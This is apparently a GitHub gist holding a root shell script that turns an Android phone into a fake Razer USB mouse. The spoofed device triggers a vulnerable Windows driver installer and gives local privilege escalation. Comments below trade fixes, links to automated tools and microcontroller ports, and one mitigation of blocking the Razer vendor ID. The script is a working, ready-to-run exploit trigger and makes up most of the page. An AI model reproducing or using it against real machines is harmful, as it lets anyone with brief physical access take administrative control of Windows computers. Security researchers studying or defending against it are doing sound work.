Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
# work as root
su
# enable CONFIGFS
mount -t configfs none /sys/kernel/config
# create gadget
mkdir /sys/kernel/config/usb_gadget/pwn_razer
cd /sys/kernel/config/usb_gadget/pwn_razer
# set vendor (Razer) & product id
# for a list of suitable devices see the inf files in driver cab archive
# (feel free to change the product id)
echo 0x1532 > idVendor
echo 0x023e > idProduct
# set USB version 2
echo 0x0200 > bcdUSB
# set device to class to Misc / Interface Association Descriptor.
echo 0xEF > bDeviceClass
echo 0x02 > bDeviceSubClass
echo 0x01 > bDeviceProtocol
# set some info strings
mkdir -p strings/0x409
echo "deadbeefdeadbeef" > strings/0x409/serialnumber
echo "an0n" > strings/0x409/manufacturer
echo "fake Razer device" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "basic Multi-function device with single TLC (MI_02)" > configs/c.1/strings/0x409/configuration
# set some fake power config values
echo 250 > configs/c.1/MaxPower
echo 0x80 > configs/c.1/bmAttributes
# add 3 mouse HID devices (protocol 2) with a basic HID report descriptor
for i in g1 g2 g3 ; do
mkdir -p functions/hid.${i}
echo 2 > functions/hid.${i}/protocol
echo 6 > functions/hid.${i}/report_length
echo BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCBAsDA | base64 -d > functions/hid.${i}/report_desc
done
# activate the HID devices
for i in g1 g2 g3 ; do
ln -s functions/hid.${i} configs/c.1/
done
# bind (for activating, disable default gadget and enable the new one)
# might need to be changed (if the active gadget is not in ../g1)
echo "" > ../g1/UDC ; getprop sys.usb.controller > UDC
@memerememe
Copy link

memerememe commented Aug 23, 2021

Woah, whats this, this seems interesting!. Is it patched yet??

@CastleCorp
Copy link

CastleCorp commented Aug 23, 2021

Woah, whats this, this seems interesting!. Is it patched yet??

Razer has said they are working on fixing it ASAP but to my knowledge, it is not fixed yet.

@memerememe
Copy link

memerememe commented Aug 23, 2021

Woah, whats this, this seems interesting!. Is it patched yet??

Razer has said they are working on fixing it ASAP but to my knowledge, it is not fixed yet.

Oh noes..

@korang
Copy link

korang commented Aug 23, 2021

I have tried several systems. I get the RAZR driver install but not the software. Unsure how you guys are getting the RAZR software to auto install...

@827Dream
Copy link

827Dream commented Aug 24, 2021

phone

try to mkdir hid.${i} in functions fail ,who can tell me why?i use LineageOS 18.1 also on nexus 6

phone1

@synap5e
Copy link

synap5e commented Aug 24, 2021

Are all the strings/configs required?
I'm trying to make a microcontroller do this but the stack I'm using doesnt let me set the configuration string, MaxPower, or bmAttributes. Also using the report_desc here causes windows to think theres a fault in the device - it seems to be 2 report descriptors back to back...

I can get a razer devices to appear in devices and printers with just the VID and PID (changing PIDs to see different devices), but nothing causing an autoinstall driver...

@lionants02
Copy link

lionants02 commented Aug 24, 2021

Wow! God device.

@tothi
Copy link
Author

tothi commented Aug 24, 2021

upgraded this to a "tool": https://github.com/tothi/usbgadget-tool

@tothi
Copy link
Author

tothi commented Aug 24, 2021

Are all the strings/configs required?
I'm trying to make a microcontroller do this but the stack I'm using doesnt let me set the configuration string, MaxPower, or bmAttributes. Also using the report_desc here causes windows to think theres a fault in the device - it seems to be 2 report descriptors back to back...

I can get a razer devices to appear in devices and printers with just the VID and PID (changing PIDs to see different devices), but nothing causing an autoinstall driver...

no, i think you don't need to config every params. but the transports are required (the number of transports (functions) is important, the content is not). check the generated device hardware id in windows and compare it with the genuine.

@827Dream
Copy link

827Dream commented Aug 24, 2021

upgraded this to a "tool": https://github.com/tothi/usbgadget-tool

haha, i try this,it can not resolve my problem (because same principle).

@memerememe
Copy link

memerememe commented Aug 24, 2021

upgraded this to a "tool": https://github.com/tothi/usbgadget-tool

Wow, this looks amazing, haven't tested out though..

@memerememe
Copy link

memerememe commented Aug 24, 2021

Any way i can test this out on a vm without it auto executing on my pc?

@synap5e
Copy link

synap5e commented Aug 25, 2021

Got my microcontroller working to trigger + automate this

pwn.mp4

@synap5e
Copy link

synap5e commented Aug 25, 2021

Any way I can test this out on a vm without it auto executing on my pc?

Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532

@tothi
Copy link
Author

tothi commented Aug 25, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

awesome! :)

@memerememe
Copy link

memerememe commented Aug 25, 2021

Any way I can test this out on a vm without it auto executing on my pc?

Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532

Thank you!!

@uraninite
Copy link

uraninite commented Aug 25, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

😮

@w0rm12
Copy link

w0rm12 commented Aug 27, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

@synap5e
Copy link

synap5e commented Sep 7, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

Sorry about the delay.
https://github.com/synap5e/razor-eop-XIAO

@linguine2552
Copy link

linguine2552 commented Sep 15, 2021

lol it even works with just basic PID and VID pairing for P4wnP1.
pwntemp

fyi > Razer patched spawning a simple shell.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment